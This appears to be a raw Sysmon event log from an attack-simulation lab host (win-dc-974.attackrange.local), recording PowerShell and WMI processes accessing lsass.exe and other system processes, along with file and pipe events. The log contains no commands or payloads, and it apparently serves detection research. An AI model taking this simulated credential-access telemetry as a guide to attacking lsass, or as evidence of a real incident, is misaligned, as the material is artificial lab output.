22:55:49.023{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697987Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.022{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697986Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.021{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697985Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.021{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697984Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697983Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697982Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.005{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000001697981Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.005{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EFB492A2C22EFC2D376B77EC9C4650DD,SHA256=75BF65E0DAAEE050631829D12CA9C2756FC1688DBDD881B3E385EFD8B6A11B6E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001697980Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.005{05ADC7E1-229F-6039-1600-00000000AD01}15407320C:\Windows\system32\svchost.exe{05ADC7E1-70F4-603D-8588-00000000AD01}6764C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697979Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.005{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-70F4-603D-8588-00000000AD01}6764C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697978Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.005{05ADC7E1-70F4-603D-8588-00000000AD01}67645980C:\Windows\system32\conhost.exe{05ADC7E1-70F4-603D-8488-00000000AD01}8564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001698236Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.286{05ADC7E1-70F5-603D-8988-00000000AD01}8940ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001698235Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.224{05ADC7E1-7049-603D-4188-00000000AD01}5784ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-out.txtMD5=BD6E406C8215BBB54A516FE56478DB6A,SHA256=0ABDEE145ACFA352A8795F034D38BC8E50C524F06612A16F90FB868FF2772F2C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001698234Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.193{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7009BB04A58BB4A0DB7AEFEB9B25A339,SHA256=3CDC451B54C6B19EC7E9E99F078770962CEA43781731D2C99171412C79316FBA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001698233Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.161{05ADC7E1-229F-6039-1600-00000000AD01}15407320C:\Windows\system32\svchost.exe{05ADC7E1-70F5-603D-8988-00000000AD01}8940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001698232Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.161{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-70F5-603D-8988-00000000AD01}8940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001698231Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.146{05ADC7E1-70F5-603D-8688-00000000AD01}8376ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001698230Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.124{05ADC7E1-229D-6039-0B00-00000000AD01}8524060C:\Windows\system32\lsass.exe{05ADC7E1-70F5-603D-8988-00000000AD01}8940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001698229Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.124{05ADC7E1-229D-6039-0B00-00000000AD01}8524060C:\Windows\system32\lsass.exe{05ADC7E1-70F5-603D-8988-00000000AD01}8940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000001698228Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-01 22:55:50.099{05ADC7E1-70F5-603D-8988-00000000AD01}8940\PSHost.132591129499741676.8940.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001698227Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.083{05ADC7E1-70F5-603D-8988-00000000AD01}8940ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_hknuogtm.xvs.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001698226Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.083{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86BE5CA122266E9BEB5179743CAA8A7B,SHA256=D79CC5CB0F5CF7DE6BE36E84B0ED9D45AEB1F901D76712A5C8D237B2AEE47F75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001698225Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.083{05ADC7E1-70F5-603D-8988-00000000AD01}8940ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_u4a2e0k2.00a.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001698224Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.068{05ADC7E1-70F5-603D-8988-00000000AD01}8940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_u4a2e0k2.00a.ps12021-03-01 22:55:50.068 10341000x80000000000000001698223Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-70F5-603D-8A88-00000000AD01}7836C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698222Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-70F5-603D-8988-00000000AD01}8940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698221Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-70F5-603D-8688-00000000AD01}8376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698220Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000001698219Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.052{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98AB2F9ECF30AA686AC30AD34DCF97E2,SHA256=A2A2244F43905AFF13A4941E79F8A2663ADA3E2DC51EE9AA128FB326C7897204,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001698218Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:50.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7049-603D-4288-00000000AD01}6208C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698217Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 